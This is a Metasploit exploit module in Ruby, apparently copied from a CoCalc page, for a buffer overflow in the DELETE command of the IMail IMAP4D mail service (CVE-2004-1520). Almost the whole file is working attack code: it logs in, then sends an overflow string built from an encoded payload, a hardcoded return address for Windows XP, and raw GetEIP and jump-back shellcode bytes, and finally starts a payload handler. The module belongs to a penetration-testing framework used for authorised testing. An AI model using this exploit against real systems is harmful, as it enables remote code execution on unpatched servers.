CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Imap
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'IMail IMAP4D Delete Overflow',
14
      'Description'    => %q{
15
          This module exploits a buffer overflow in the 'DELETE'
16
        command of the IMail IMAP4D service. This vulnerability
17
        can only be exploited with a valid username and password.
18
        This flaw was patched in version 8.14.
19
      },
20
      'Author'         => [ 'spoonm' ],
21
      'License'        => MSF_LICENSE,
22
      'References'     =>
23
        [
24
          [ 'CVE', '2004-1520'],
25
          [ 'OSVDB', '11838'],
26
          [ 'BID', '11675'],
27
        ],
28
      'Privileged'     => true,
29
      'DefaultOptions' =>
30
        {
31
          'EXITFUNC'  => 'thread',
32
        },
33
      'Payload'        =>
34
        {
35
          'Space'    => 614,
36
          'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
37
          'StackAdjustment' => -3500,
38
          'EncoderOptions' =>
39
            {
40
              'BufferRegister' => 'EDX',
41
            }
42
        },
43
      'Platform'       => 'win',
44
      'Targets'        =>
45
        [
46
          # alphanum rets :(, will look more into it later
47
          ['Windows XP sp0 comctl32.dll', { 'Ret' => 0x77364650 }],
48
        ],
49
      'DisclosureDate' => '2004-11-12',
50
      'DefaultTarget' => 0))
51
  end
52

53
  def exploit
54
    connect_login
55

56
    print_status("Sending overflow string...")
57
    req = 'A683 DELETE '
58
    req << payload.encoded
59

60
    # Jump over code
61
    req << "\x74\x32\x75\x30"
62
    req << [target.ret].pack('V')
63
    req << rand_text_alphanumeric(44)
64

65
    # GetEIP code
66
    req << "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59"
67
    req << "\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59"
68

69
    # Alphanumeric jmp back (edx context)
70
    req << "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41"
71
    req << "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50"
72
    req << "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57"
73
    req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a"
74

75
    # Run off the stack, so we don't kill our payload, or something...
76
    req << rand_text_alphanumeric(600)
77

78
    # Terminate the request
79
    req << "\r\n"
80

81
    sock.put(req)
82

83
    handler
84
    disconnect
85
  end
86
end
87

88